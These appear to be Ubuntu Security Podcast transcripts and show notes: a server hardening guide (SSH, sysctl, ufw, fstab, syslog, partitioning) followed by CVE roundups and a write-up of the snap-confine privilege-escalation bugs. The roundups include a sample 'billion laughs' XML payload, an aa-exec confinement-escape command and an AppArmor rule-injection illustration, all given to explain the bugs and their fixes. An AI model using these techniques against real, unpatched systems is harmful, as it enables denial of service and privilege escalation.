That being said though, being safe and setting up both is always good. You should define who is allowed to access the system remotely if you plan on implementing a secure server. Organization and maintenance are also part of the security process, so defining such things will lead to a more secure environment. The same can be done with IP addresses. It is possible to define in the SSH configuration file which IP addresses are allowed to access a device remotely. Other settings such as session timeout, the number of concurrent SSH connections, and the allowed number of authentication attempts, can all be set in the SSH configuration file as well. However, I will not dive into details for those cases since more pressing matters must be discussed here: disallow access through password authentication for your SSH server. Use private keys instead.
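Collected in one place, the settings discussed above map to a handful of ‘sshd_config’ lines - a sketch; the user name is a placeholder, and SSH1 needs no explicit disabling on modern OpenSSH since support for it was removed entirely:

```
# /etc/ssh/sshd_config - minimal hardening sketch
PermitRootLogin no
PasswordAuthentication no     # keys only - more on this next
AllowUsers deploy             # 'deploy' is a hypothetical allowed user
MaxAuthTries 3
ClientAliveInterval 300       # probe idle clients (pairs with ClientAliveCountMax)
# then: sudo systemctl restart ssh
```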
The private-public key system is used and has its use suggested because it works, and it is an efficient way to identify and authenticate a user trying to connect. However, do not treat this as a panacea that will solve all of your problems, since, yes, using private keys to connect through SSH is the better option, but it will not be if implemented carelessly. It is well known that you can use private keys as a login mechanism to avoid having to type passwords. Don’t adopt SSH private key login if that is your only reason for it. Set up a private key login for a more secure authentication process, and not because you might be too lazy to type in your long and non-obvious password. Set up a private key with a passphrase, because then there is an additional security layer enveloping the authentication process that SSH will be performing. Generate private keys securely, going for at least 2048-bit keys, and store them securely as well. There is no use implementing this kind of authentication if you are going to leave the private key file accessible to everyone, with ‘777’ permissions in your filesystem. Another important thing to note: correctly configure the ‘authorized_keys’ file in your server, such that it isn’t writable by any user accessing the system. The same goes for the SSH configuration file. Authorized keys should be defined by the system administrator and SSH configurations should only be changed by the system administrator, so adjust your permissions in the files that record this information accordingly.
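The generation and permission steps, in command form - a sketch (4096-bit RSA shown; ed25519 is an equally good modern choice):

```
ssh-keygen -t rsa -b 4096           # prompts for a passphrase - set one!
chmod 600 ~/.ssh/id_rsa             # private key readable by its owner only
chmod 600 ~/.ssh/authorized_keys    # on the server: not writable by others
```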
Wow. That was a lot, and we aren’t even getting started! Oh man! This is exciting, and it goes to show that hardening a system is hard work. Pun completely intended. It also goes to show that it requires organization. This might be off-putting to most, but can we really give ourselves the luxury of not caring about such configurations considering that attackers nowadays are getting smarter and more resourceful? With all the technology out there which allows us to automate processes, we should be measuring up to sophisticated attackers, and doing the bare minimum shouldn’t even be a consideration, but instead a certainty. That’s why we are going beyond here and we are implementing kernel hardening measures as well.
The ‘sysctl’ command, present in the Ubuntu system, can be used to modify and set kernel parameters without having to recompile the kernel and reboot the machine. Such a useful tool, so why not take advantage of the ease brought by it and harden your system kernel as well? With ‘sysctl’ it is possible to do things such as tell a device to ignore PING requests, which can be used by an attacker during a reconnaissance operation. Sure, this is not the most secure and groundbreaking measure of all time, however, there are other things that can be set through ‘sysctl’, this was just an introductory example, you impatient you! The reading of data in kernel logs can be restricted to a certain set of users in order to avoid sensitive information leaks that can be used against the kernel itself during attacks, when you configure ‘sysctl’ parameters to do so. So, there you go, another example. It is also possible to increase entropy bits used in ASLR, which increases its effectiveness. IP packet forwarding can be disabled for devices that are not routers; reverse path filtering can be set in order to make the system drop packets that wouldn’t be sent out through the interface they came in, common when we have spoofing attacks; Exec-Shield protection and SYN flood protection, which can help prevent worm attacks and DoS attacks, can also be set through ‘sysctl’ parameters, as well as logging of martian packets, packets that specify a source or destination address that is reserved for special use by IANA and cannot be delivered by a device. Therefore, directly through kernel parameter settings you have a variety of options, that go beyond the ones mentioned here, of course, and that will allow you to harden your system as soon as after you finish your install.
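Several of the examples above translate directly into ‘sysctl’ keys. A sketch - these keys are real, but review each against your own needs before applying anything:

```
# /etc/sysctl.d/99-hardening.conf
net.ipv4.icmp_echo_ignore_all = 1     # ignore PING requests
kernel.dmesg_restrict = 1             # restrict kernel log reading to privileged users
net.ipv4.conf.all.rp_filter = 1       # reverse path filtering (anti-spoofing)
net.ipv4.tcp_syncookies = 1           # SYN flood mitigation
net.ipv4.conf.all.log_martians = 1    # log martian packets
net.ipv4.ip_forward = 0               # not a router? don't forward packets
# apply with: sudo sysctl --system
```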
So, we’ve talked about the users, we’ve talked about SSH, we’ve talked about the kernel, and we have yet to pronounce that word that is a cyber security symbol, the icon, used in every presentation whenever we wish to talk about secure systems or, by adding a huge X on top of it, breached networks. The brick wall with the little flame in front of it. The one, the only, the legendary and beloved firewall. No, firewalls are not the solution to all security problems, but if it became such an important symbol, one that carries the flag for cyber security measures most of the time, it must be useful for something, right? Well, let me be the bearer of good news and tell you that it is! Firewalls will help you filter your network traffic, letting in only that which you allow and letting out…only that which you allow. Amazing! If you have a server and you know what ports this server will be using, which specific devices it will be connecting to and which data it can retrieve from the Internet and from whom, then you can set up your firewall very efficiently. In Ubuntu, you can use ‘ufw’, the Uncomplicated Firewall, to help you set up an efficient host based firewall with ‘iptables’. “Why would I need a host based firewall if I have a firewall in my network, though?”, you might ask. Well, for starters, having a backup firewall to protect your host directly is one more protection layer you can add to your device, so why NOT configure it? Second of all, think about a host based firewall as serving the specific needs of your host. You can set detailed rules according to the way the device in question specifically works, whereas on a network based firewall, rules might need to be a little more open and inclusive to all devices that are a part of the network. Plus, you get to set rules that limit traffic inside the perimeter that the network firewall delimits, giving you an increased radius of protection for the specific device we are considering here. Another advantage, if the various advantages mentioned here are not enough: if your server is running on a virtual machine, then when this machine is migrated, that firewall goes with it! Portability for the win! If you are not convinced yet, I don’t know what to say other than: have you seen the amazing firewall logo? Putting that cute little representation of cyber security in the host diagrams in your service organization files will definitely bring you joy, guaranteed.
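A ‘ufw’ session for a simple web server might look like this - a sketch; open only the ports your service actually uses:

```
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow 22/tcp     # SSH - ideally restricted further by source address
sudo ufw allow 443/tcp    # HTTPS
sudo ufw enable
sudo ufw status verbose
```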
Next in configuring our still-waiting-to-become-a-full-fledged-server system is ‘fstab’. The ‘fstab’ file is a system configuration file in Ubuntu which is used to define how disk partitions and other block devices will be mounted into the system, meaning, defining where in the Linux directory tree these devices will be accessible from when you are using the operating system. Therefore, every time you boot your computer, the device which contains the data that you expect to use needs to be mounted into the filesystem. ‘Fstab’ does that for you during the boot process, and what is even better: it allows you to set options for each partition that you will mount, options that change how the system views and treats data in each of these partitions. Remember eons ago when we were talking about disk partitioning and I said there was more to it than just isolating /tmp from everything? Well, the time has finally come to talk about it. So, even though it’s not Thursday, let’s go for the throwback and keep the /tmp example alive, shall we? If during install you separated your partitions and put /tmp in its own separate area, you can use ‘fstab’ when mounting the partition that will be represented by the /tmp directory and set it as a ’noexec’ partition. This is an option that tells the system that no binaries in this partition are allowed to be executed. You couldn’t have done this if your entire system was structured to be under one single partition, or else the entire partition would be non-executable, and then you could not have a server running on that device. You could also go one step further and make the partition read-only, although for /tmp that might not be the best choice given the reason for its existence. Applying this to another situation though, if you have a network shared directory with its own partition, for example, it is possible to make this partition read-only, and avoid consequences that might arise from having users over the internet being able to write to it. Another suggestion: setting up the /proc directory with the ‘hidepid=2, gid=proc’ mount options as well as the ’nosuid’, ’noexec’ and ’nodev’ options. The /proc directory is a pseudo-filesystem in Linux operating systems that will contain information on running processes of the device. It is accessible to all users, meaning information on processes running in the system can be accessed by all users. We don’t necessarily want all that juicy data about our processes to be available out there for anyone to see, so setting the ‘hidepid’ and ‘gid’ parameters to the previously mentioned values will ensure that users will only be able to get information on their own processes and not on all processes running in the server, unless they are part of the ‘proc’ group. The ’noexec’, ’nosuid’ and ’nodev’ options will make this part of the filesystem non-executable, block the operation of ‘suid’ and ‘sgid’ bits set in file permissions and ignore device files, respectively, in this file system. So…more hardening for the partition. A simple one line change in the /etc/fstab file that can make a very big difference when considering the protection of your server. Though, once again, I stress that all of these are possibilities and, considering our main example here, if you do have software that requires execution from /tmp, which is a possibility when we consider that there are packages that execute files from /tmp during install, please do not follow the suggestions here directly, but instead adapt them to your environment and your needs.
Listener discretion is therefore advised.
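For the discreet listener, the two examples above as ‘fstab’ lines - the device name is a placeholder, so adapt before copying anything:

```
# /etc/fstab - sketch; '/dev/sda3' is a hypothetical device
/dev/sda3  /tmp   ext4  defaults,noexec,nosuid,nodev                     0  2
proc       /proc  proc  defaults,hidepid=2,gid=proc,nosuid,noexec,nodev  0  0
```

Remount (or reboot) afterwards and test your workload, since, as noted, some package installs expect to execute files from /tmp.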
Our last post install tip comes in the shape of a file…a file filled with lines and more lines of information about your system. Use your logs! Take care of your logs! Embrace your logs. Ignorance might be bliss in a lot of situations, but when it comes to a computing device, going that extra mile to understand it might be what saves you from the future robotic takeover a lot of people are expecting to happen. Why? Because if you know the logs, you know the system, what is happening, where the issues are! And then when the robots conquer, you will be the one that knows how it feels, its innermost secrets. The connection you build with that single computer might save the world from AI takeover. Victory through empathy. Ok, seriously though, I continue to be as dramatic as ever, but do not let my exaggeration steer you away from the most important takeaway here. Most of the logging information in an Ubuntu system will be found under the /var/log directory, with logging being performed primarily by ‘syslog’. The ‘syslog’ daemon will generate all kinds of log files, from authorization logs, to kernel logs, to application logs. Apache, for example, has a log file entry under /var/log, considering you have it installed in your system. You can configure your device to use the syslog daemon to send log data to a syslog server, which will centralize log data that can then be processed by another application in a faster and more automated manner. Do remember to transfer your logs through the network in a secure, preferably encrypted fashion though, or else you are just leaving sensitive data about your server and everything in it out there for the taking. That being said, here, your configuration file of choice will be /etc/syslog.conf (on modern Ubuntu systems, where ‘rsyslog’ does this job, it will be /etc/rsyslog.conf and the files under /etc/rsyslog.d). In this file, you will tell the ‘syslog’ daemon what it should do with all that data gold it’s collecting from your system. You can set what is the minimum severity level for messages that will be logged, as well as set what will be done with these log messages once they are captured. These can be piped into a program, for example, which can then process the message further and take some kind of action based on the outcome, like sending the message via e-mail to a desired mailbox, or, as previously mentioned, they can be sent directly to a centralized server that will perform further analysis of the information through other third party software. With the data and the means to send it to a place where it can be properly processed, you have all that is necessary to appropriately and securely understand what is happening to your system. You can then follow up on issues quickly enough whenever you have one that is a threat to your server’s security. Reaction measures are also a part of the hardening process, since we can have situations where prevention is just not enough.
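Classic ‘syslog’-style configuration lines look like this - a sketch using rsyslog conventions, where a single ‘@’ forwards over UDP and ‘@@’ over TCP; the server name is a placeholder:

```
# /etc/rsyslog.d/60-forward.conf - sketch
auth,authpriv.*    /var/log/auth.log              # keep auth events locally
*.err              @@logserver.example.com:514    # ship errors to a central server over TCP
```

For genuinely protected transport you would additionally configure TLS for the forwarding, which rsyslog supports.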
Billions of theoretical years have passed so far for our ever expanding and evolving digital galaxy…and I am sure it actually feels like that after all the talking I have done, but please bear with me for a little while longer. Earth is finally ready to have its first living creature be born! It is finally time to install the software needed to transform this, up until this point, regular device, into a mighty Internet connected server. It is time to get our applications running, our ports open, and our data flowing. Let’s do this securely, however, shall we? Wait. Not yet though. Earth was able to wait a billion years, so you might just be able to wait another week! I know. I am being mean. Anyway, not much I can do about it now! Don’t forget to share your thoughts with us on our social media platforms and I will see you all next week for the grand finale! Bye!
It’s a big week for kernel security vulnerabilities - we cover Dirty Pipe and fixes for the latest microarchitectural side channel issues, plus we bring you the first in a 3 part series on hardening your Ubuntu systems against malicious attackers.
34 unique CVEs addressed
- `Set-Cookie2` header - obsolete HTTP response header used to send cookies from the server to the user - possible infinite loop when parsing responses which contained this header
- Redis: the packaging failed to set the `package` variable and as such left this global variable uninitialised - an attacker with the ability to execute a Lua script could then cause Lua to load the full system liblua unsandboxed and hence then use this to execute other arbitrary commands on the host
- Dirty Pipe: the `pipe` and `splice` system calls could be abused to cause the kernel to overwrite contents of arbitrary files even when a user had no write permission to the particular file (even on immutable and RO-filesystems)

Hello listener! Welcome to another episode of the Ubuntu Security Podcast where I, Camila, will be talking to you all more about one subject or another involving the Ubuntu Linux distribution and cyber security in general. Today’s episode is a response to a request. A request from someone that wants to learn more about how it is possible to create an Ubuntu system, which will be running some type of service, in a secure manner. After all, we do live in times where threats that were only physical have migrated to the digital world as well, so just having a server set up with all ports open and no access control set is no longer an option for those that wish to use the almighty Internet to provide some type of service. Heck! The concern should exist even if you don’t wish to have an Internet facing server, but simply if you own a computer…or a smartphone…or a smart TV…or a car. Or anything really. We are all connected by our WiFis, whether we want it or not, so taking care of our own digital perimeter has become something essential, and something that we all should be applying to not get spammed nor scammed these days. So, since I do love me some lists, let’s talk about, in a chronological list format, what measures you can apply to your Ubuntu OS and what tools you can use in this same OS to make it safer, hardened against the cold and harsh wave of 0’s and 1’s that might be traveling out there through fiber optic cables just waiting to hack into your system.
Let’s start with the basics and talk about what can be done with the tools that you already have when you have an Ubuntu Linux coming fresh out of the bootable USB stick you used to format your computer. Actually, if we are indeed doing this, let’s do it for real: we will go back even further, and talk about the basics that can be done not only after a fresh install, but also, while you are installing your system. Let’s get prepared for the Ubuntu big bang and talk about what needs to happen before our binary universe can start to exist and securely function inside our CPUs and hard drives.
During an Ubuntu install you will make a few choices, such as whether or not you want to encrypt data in your disk. If you are not the one installing your own system, and you have an already running basic Ubuntu system in a cloud service platform, for example, this might not be something possible for you. However, if you do have the chance to apply this, it is a hardening measure that can be used to protect all data being saved in your hard drive. Of course, we need to consider that not all situations might fit well with this, as, for example, a server that forces the system to reboot frequently would require a password every time at system startup, something that one might not want to do, or be available to do, every single time, especially considering a situation where a completely automated system is the main goal to be achieved here. It is also important to consider that encrypting your hard drive might affect general file I/O performance, since data being read from the disk needs to be decrypted every time, before being presented to the user or to the system for further processing, and data that will be written to the system needs to be encrypted before it is sent permanently to the hard drive. However, if none of those cases concerns you at all, the question here might be: why NOT encrypt your hard drive? If your hardware allows it, making the process fast, it might even be worth it despite the delay you can have due to the necessary encryption and decryption operations being performed. Either way, your data can be protected from those that might want to access it without authorization. Do not kid yourself by thinking that hackers will always stay behind a screen, as there are the very bold who might just think that by stealing your hard drive they will get what they need. Without a password, though, hackers can connect the disk to whatever computer they like, but the data will remain encoded and unreadable. Remember though, full disk encryption will NOT protect data in transit, also known as data you sent through the wires or through the air, via the World Wide Web, to other devices around the world. Disk encryption, as the name suggests, is local to the disk which is associated with your own device. Oh, also do be aware that the password used to encrypt the disk cannot be lost, or else you might become your own worst enemy and lose your data, which turns into nearly impossible-to-crack cipher text.
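If you are ever unsure whether an existing machine was installed with full disk encryption, a quick look at the block device tree will tell you (the device name below is just an example):

# a "crypt" entry between the partition and the filesystem indicates LUKS
lsblk -o NAME,TYPE,FSTYPE,MOUNTPOINT
# inspect the LUKS header of a suspected encrypted partition
sudo cryptsetup luksDump /dev/sda3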
Still talking about disk configurations during the installation process, do consider creating a swap partition when setting up your system. The swap partition is essentially used by the Ubuntu System as if it were RAM. Therefore, if your RAM is filled up completely, the swap partition, which is actually a part of the hard drive, will be used rather than the RAM memory space to perform necessary operations. A swap partition can also be used to make more RAM space available during a certain point in processing time, said space being provided for data that is more relevant or is being used more frequently. Data that is being less used, less referenced, can therefore be moved to swap space instead of being left in the ever busy, constantly used RAM. The swap will act as an extension of your RAM, but do note, it is not as efficient as RAM, since it is actually your hard drive pretending to be something that it is not: a volatile memory device. Setting up a swap partition, however, can be very useful to increase performance in your server. As previously mentioned, swap space can be used to store data that is not all that frequently accessed, opening up space in RAM for more regularly accessed information. Since data in the swap is not being used constantly, the delay you would have when performing I/O operations on it becomes less of an issue, and you essentially gain more RAM space to process whatever your server needs to process. And, you know, even if people do forget it sometimes, remembering about it only when they suffer a massive DoS attack, availability is one of the 3 pillars of cyber security, so preparing for that in order to guarantee a system with better performance is valuable. Another big advantage of having swap lies in the fact that you as a system administrator might have more time to react to possible memory issues when your server is facing them. When you run out of memory and you don’t have swap, you risk having your system suddenly crash and not only losing all data that was in RAM, but having your service be out of reach for who knows how long. You can also have OOM killer go and kill your most important process because you are…running out of memory…and it doesn’t even have the courtesy of asking you if you are ok with it. Just rude! If you set up your swap space to at least the size of your largest process though and you monitor your system, you are able to detect possible issues by analyzing swap space usage, and then you can most likely avoid many undesired service and system crashes. However, do not forget: setting swap can boost your system performance, just as it can hinder it if you don’t implement things correctly. Your main volatile memory source should be your RAM, and the swap partition will not be a substitute for it. Therefore, if you have little RAM and over-encumber your system, you won’t make it any faster by using swap, as the hard drive will be used to process that overflowing amount of data that should be being processed primarily by your RAM. The idea is to use swap as a complementary performance measure to your appropriately RAM-sized system. If using swap memory, don’t forget to configure how this extra memory space will be used together with your RAM, by setting the ‘swappiness’ metric, for example, which will tell the kernel how aggressively it will swap memory pages in the system when necessary.
Once again, setting too high a value might make your system inefficient, as you start making your kernel believe that the hard drive is actually RAM - the perfect disguise - but setting a low value might also not give you the best performance possible. Each case will be its own, so know your system and your needs, and act accordingly.
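As a minimal sketch of what that tuning looks like (the value 10 is purely illustrative - pick one based on your own workload):

# check the current value - Ubuntu defaults to 60
sysctl vm.swappiness
# lower it so the kernel swaps only under real memory pressure, and
# persist the setting across reboots
sudo sysctl vm.swappiness=10
echo 'vm.swappiness=10' | sudo tee /etc/sysctl.d/99-swappiness.conf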
Our install happens on our disk, so, unfortunately I must tell you that once again we will be checking out disk settings we can consider when creating our hardened Ubuntu server. Cheers to our disks! Installing all of the system in one single partition tends to be a lot easier and a lot faster. However, we are not looking for easy here, we are looking for secure, so let’s get out of the one single partition and out of our comfort zones and possibly separate our system directories into different partitions. Having /boot in a separate partition is useful to avoid not being able to log into a system after the current kernel image has run across issues. The backup kernel images will be available and you might be able to do a quicker recovery that won’t require connecting an external device in, or removing your own in order to fix what has been broken in the OS. In case you encrypt your / (root) partition, you will need to perform this regardless, or else, your OS won’t boot. Encrypted code might be cool looking but it’s not exactly functional considering a situation where you need to know what are the basic instructions that will allow you to get the operating system up and running. Encrypting /boot together with / (root) would be the same as hearing the “ready, set, go” at a car race and staying stuck in place because you just remembered you put a boot in your wheel. The locked boot is stopping you from moving the car forward and getting it where you need it to be, and, considering /boot outside of the analogy, it’s stopping you from getting your computer to execute your operating system because it’s encrypted. Therefore, if you encrypt your hard drive, as previously suggested, you already get to escape from the old boring one partition scheme. That being said with this very convenient analogy, let’s get back to it and discuss the other partitioning options you might have and that you can apply to your system in order to make it more efficient and more secure, options which include, for example, putting /tmp in a separate partition. This is most likely a good call, especially considering that world-writable /tmp is a common target for attackers. Servers that might use /tmp for storage of, as the name suggests, temporary files could cause a self DoS in case this directory is filled up with various large files. If the directory is in a different partition, however, only that specific partition will fill up and not the entire system storage instead. Other processes using other directories in your system are unaffected and only the process filling up /tmp is terminated. It is also a lot easier to manage a filled up /tmp partition than it is the entire system. Plus, different permissions can be set for this specific partition later on, but we will discuss this soon enough, albeit not now. Separating the /home and the /var directories from the rest of the system also shares these advantages. Leaving these directories in their own separate “drawers” inside the closet that is our hard drive might be an interesting choice in order to avoid necessary space to be taken up by a file that might not be essential for the workings of the server. The /home directory will contain user files, and we don’t trust users, and the /var directory might get filled up completely with a huge amount of logs, for example. Filling up the logs might be an attack of choice made by some hacker out there, but if you created a separate partition, you were prepared for it. 
Having smaller partitions also makes for faster file searches in the system, which might be a valid performance boost for your IT infrastructure. If you plan to share resources through the network, have these resources be connected to a directory mounted in a separate partition, as you can have more permissive access control rules in the shared partition, but keep the rigorous one in all others that might contain sensitive information, which is in itself another advantage: different partitions, different permissions during mount time. However, we will go into more detail about this later on, as I already mentioned. The point here is: separate partitions are separate filesystems, and, therefore, the OS will not behave in the same way as it would if all data were to be stored under a single partition…a single filesystem. All of that being said, it will require more management than a system that has only one partition, and space usage might not be the most efficient when you establish limits to each directory. However, if it is feasible for your needs, it might be a good way to avoid some issues…security issues.
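To give a flavour of the per-partition permissions hinted at above, here is a hypothetical /etc/fstab fragment - device names and filesystems are assumptions, and do test noexec on /tmp before committing to it, as some package maintainer scripts expect to execute from there:

# /tmp: no device nodes, no setuid binaries, no execution
/dev/sda5  /tmp   ext4  defaults,nodev,nosuid,noexec  0 2
# /home: user data should never provide devices or setuid binaries
/dev/sda6  /home  ext4  defaults,nodev,nosuid         0 2
# /var: logs and spools, kept from exhausting the root filesystem
/dev/sda7  /var   ext4  defaults,nodev                0 2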
Up next, I say this every time and I will never get tired of saying it: strong passwords, people! Strong passwords! Whenever creating the first user for your Ubuntu system, which will happen during the install process, do not use your birthday as your password. Or your dog’s name…or any 6 letter word followed by the digits that are the current year. Easy to remember, easy to hack. The first step to avoid being hacked is not wanting to be hacked, and forgive me if I am being too blunt, but setting up lazy passwords and not expecting it to be a problem is like eating rotten food and expecting to not get sick: you can wish all you want, but the outcome will not be positive for you, my friend…or for your closest loved ones involved. So…strong passwords, please, and non-expired food.
Our system is installed. BIG. BANG. Our Ubuntu OS universe now exists after we set everything up so that it looks just right for our security needs. All is not done, however, since after the big-bang, the galaxy and more specifically Earth, had to go through a lot of steps before it was ready to host life, which is our main goal here: host life in the form of executable, network service providing code. We now have galaxies, stars, planets, and all necessary to maybe create life in the future, but first things first, we need our huge ball of fire to be tweaked a little bit, since life as we know it will not be born in such an unsafe, or might I say, insecure environment. Let’s then make it secure so that we can start thinking about giving it some life, or, in our case, installing some software, developing customized code, setting up frameworks, all that good stuff that makes developers go crazy with excitement.
I will, however, keep you on your toes, and continue talking more about this subject in another episode only! So stay tuned to the podcast to continue on this Ubuntu hardening journey with me, and while you wait for what is to come, feel free to share your thoughts in any of our social media platforms, as your opinion is always welcome! I await your return to the podcast in the following weeks so that we can once again share information, but for now I bid you all farewell and until next time! Bye!
This week we do the usual round-up of security vulnerability fixes for the various Ubuntu releases, plus we discuss enabling PIE for Python and preview some upcoming content on Ubuntu system hardening as well.
44 unique CVEs addressed
wordexp() / realpath() / getcwd() functions etc

Ubuntu 20.04.4 LTS is released, plus we talk about Google Project Zero’s metrics report as well as security updates for the Linux kernel, expat, c3p0, Cyrus SASL and more.
62 unique CVEs addressed
lol9 which was defined as 10 copies of lol8, which was defined as 10 copies of lol7, etc…
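For illustration, a cut-down version of such a document can be written like this (only three levels deep here - the real attack nests around ten, for roughly a billion expansions):

# write a 3-level version of the expanding "billion laughs" document
cat > lol.xml <<'EOF'
<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>
EOF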
The Ubuntu team is pleased to announce the release of Ubuntu 20.04.4 LTS (Long-Term Support) for its Desktop, Server, and Cloud products, as well as other flavours of Ubuntu with long-term support.
Like previous LTS series, 20.04.4 includes hardware enablement stacks for use on newer hardware. This support is offered on all architectures.
Ubuntu Server defaults to installing the GA kernel; however you may select the HWE kernel from the installer bootloader.
As usual, this point release includes many updates, and updated installation media has been provided so that fewer updates will need to be downloaded after installation. These include security updates and corrections for other high-impact bugs, with a focus on maintaining stability and compatibility with Ubuntu 20.04 LTS.
Kubuntu 20.04.4 LTS, Ubuntu Budgie 20.04.4 LTS, Ubuntu MATE 20.04.4 LTS, Lubuntu 20.04.4 LTS, Ubuntu Kylin 20.04.4 LTS, Ubuntu Studio 20.04.4 LTS, and Xubuntu 20.04.4 LTS are also now available. More details can be found in their individual release notes:
https://wiki.ubuntu.com/FocalFossa/ReleaseNotes#Official_flavours
Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Core. All the remaining flavours will be supported for 3 years. Additional security support is available with ESM (Extended Security Maintenance).
This week Qualys dominate the week in security updates, disclosing details of 4 different SUID-root vulnerabilities, including Oh Snap! More Lemmings (Local Privilege Escalation in snap-confine), plus we look at updates for Firefox, cryptsetup and more.
23 unique CVEs addressed
/proc/self/mountinfo to validate if it is a FUSE fs
(deleted) to the name of it in the mount table
mountinfo to get the actual path
(deleted) in the name - and then libumount will strip this off and umount the original path - ie. could mount at /tmp/ (deleted) then call umount /tmp and this will succeed
(deleted) suffix as this has not been used by the kernel since December 2014

https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt
Qualys appear to have been auditing various SUID-root binaries - recently
looked at snap-confine - low-level application, written in C, and used by
snapd to setup the execution environment for a snap application - as the
name suggests, it sets up the confinement for an application, creating
a separate mount namespace with own private /tmp
and /dev/pts
- as well
as any other mounts through content interfaces or layouts etc defined by
the snap, plus loading of seccomp syscall filters for the resulting snap
As such requires root privileges, hence is SUID-root - high value target
Very defensively programmed itself, plus is confined by seccomp and AppArmor itself
Nonetheless, even the most carefully programmed software can have issues
2 vulns:
Qualys liken these vulnerabilities (or the process to finding them) as like playing the original Lemmings game, due to the complex nature of steps required to thwart the defense-in-depth construction of snap-confine
Not the first time snap-confine has been audited - SuSE Security Team previously audited it in 2019 and found a couple issues, in particular in some of the same code sections as these
Back to these vulns:
When creating or deleting the mount namespace, snap-confine uses 2
helper programs written in Go - these are installed in the same
location as snap-confine, so it looks them up from the same directory
where it is running itself - however, since (when protected_hardlinks
is disabled) an unprivileged user could hardlink snap-confine into say
/tmp
they could also then place their own malicious binary in place of
these helpers and have that get executed by snap-confine instead
NOTE: protected_hardlinks
is enabled by default on almost all distros
so unless this has been changed by the system admin, this is unable to
be exploited in reality
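You can confirm that the mitigation is active on a given system - a value of 1 blocks the hardlink trick described above:

# should print: fs.protected_hardlinks = 1 (the Ubuntu default)
sysctl fs.protected_hardlinks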
Other vuln is a race condition when creating the private mount
namespace for the snap - snap-confine creates a per-snap private
directory under /tmp
- this is a known “dangerous” thing to do since
/tmp
is world writable so users could easily try and symlink their own
contents into it etc
snap-confine is very careful then to try and ensure this directory is owned by root and to then avoid following symlinks when traversing this hierarchy etc
However, when then doing the actual mount()
syscall to start setting up
the mount namespace inside this directory, the absolute path of this
directory is given to mount()
(since sadly there is no mountat()
or
similar syscall) - which then does follow symlinks allowing a user who
can race the creation of this directory with snap-confine to be able to
take control of the contents of it, and hence inject their own
libraries and configuration such that a malicious library can be
preloaded into a subsequent execution of snap-confine - and since
snap-confine will then still run as root, this allows to get root code
execution
In both cases, the use of AppArmor by default tries to isolate
snap-confine - and snap-confine is programmed defensively such that it
will refuse to execute if it is not confined by AppArmor - however, the
checks for this were not strict enough, and Qualys found they could use
aa-exec
to execute snap-confine under a separate, more permissive
AppArmor profile to escape these restrictions
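The general shape of that trick looks something like the following, with a hypothetical permissive profile name - note this no longer works against patched snap-confine, which now verifies its own profile:

# run a target binary under a different, looser AppArmor profile -
# "some-permissive-profile" is a placeholder for any loaded profile
# with wider permissions than snap-confine's own
aa-exec -p some-permissive-profile -- /usr/lib/snapd/snap-confine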
Fixes for these issues were numerous - to both add additional hardening
to snap-confine so that it would validate the AppArmor profile it
executes under is the one that is expected - plus the actual fixes for
the vulnerabilities themselves, by checking snap-confine
is located where
it expects to be (so it doesn’t execute other arbitrary helpers), and,
when setting up the mount namespace directory hierarchy, to forcefully
move aside any existing parts that are not root owned so it can
create them afresh with known ownership/permissions so that unprivileged
users can’t trick it with their own contents
As mentioned, also includes fixes for 2 other issues identified by Canonical - open permissions on snap per-user HOME/private storage allows other users to potentially access private info stored by snaps
Plus a more sinister issue in the handling of AppArmor rules for snaps
A snap can define a content interface - way of making files available to other snaps - snaps can then connect to this to access that content - often used to implement plugins or other such concepts between snaps
When creating an AppArmor profile for a snap, adds additional rules then to allow access to these paths within the other snap
Included code to validate that a snap wasn’t trying to expose content it shouldn’t BUT didn’t validate that these were just paths and nothing else
Since AppArmor policy is human-readable text files, these get generated by snapd by adding the content interface paths into the policy
Content interface path could then contain additional AppArmor policy directives and these would get included in the generated profile
Since any snap can specify content interfaces, and they get auto-connected by snaps from the same publisher, would then just have to get a user to install 2 malicious snaps from the same publisher where one declares a malicious interface like this and then the snaps will be able to escape the usual strict confinement provided by AppArmor
Fixed in snapd to both validate paths more correctly, and to also quote all file-system paths in the generated AppArmor policies so that arbitrary rules cannot be specified
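As a rough sketch of why the quoting matters (the paths and rules below are invented for illustration): AppArmor profiles are plain text, so an unquoted "path" that itself contains rule syntax changes the meaning of the generated line.

# what snapd intends to generate for a content interface path:
#   "/snap/other/1/shared/" rw,
# what an unquoted, attacker-chosen "path" of
#   /snap/other/1/shared/ rw, /**
# could turn that same line into - note the injected /** rule:
#   /snap/other/1/shared/ rw, /** rw,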
Shows that the defence-in-depth approach is still worthwhile - Qualys mentions they nearly gave up looking for vulns and then on trying to exploit them due to just how hard the task appeared given all the defensive measures they would have to overcome
Want to thank Qualys for all their efforts in disclosing vulns and in providing feedback on proposed fixes etc, and the snapd team for all their help on finding and remediating the vulnerability with content interface / layout paths, plus on preparing and delivering this update
Has been in the works for a while, glad it is finally out
It’s main vs universe as we take a deep dive into the Ubuntu archive and look at these components plus what goes into each and how the security team goes about reviewing software destined for main, plus we cover security updates for Django, BlueZ, NVIDIA Graphics Drivers and more.
53 unique CVEs addressed
vfs_fruit RCE
{% debug %} template tag - failed to properly encode the current context

We’re back after a few weeks off to cover the launch of the Ubuntu Security Guide for DISA-STIG, plus we detail the latest vulnerabilities and updates for lxml, PolicyKit, the Linux Kernel, systemd, Samba and more.
100 unique CVEs addressed
CL_SCAN_GENERAL_COLLECT_METADATA option and handling OOXML files - remote attacker could supply an input file which could trigger this -> crash
.screenrc file which could possibly contain private info
LD_PRELOAD value to cause arbitrary code to be executed as root

DISA-STIG is a U.S. Department of Defense security configuration standard consisting of configuration guidelines for hardening systems to improve a system’s security posture.
It can be seen as a checklist for securing protocols, services, or servers to improve the overall security by reducing the attack surface.
The Ubuntu Security Guide (USG) brings simplicity by integrating the experience of several teams working on compliance. It enables the audit, fixing, and customisation of a system while enabling a system-wide configuration for compliance, making management by diverse people in a DevOps team significantly easier.
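As a sketch of the workflow (assuming the usg tool and the disa_stig profile name from its documentation):

# audit the current system against the DISA-STIG profile and
# produce a compliance report of passes and failures
sudo usg audit disa_stig
# apply the remediations for the same profile
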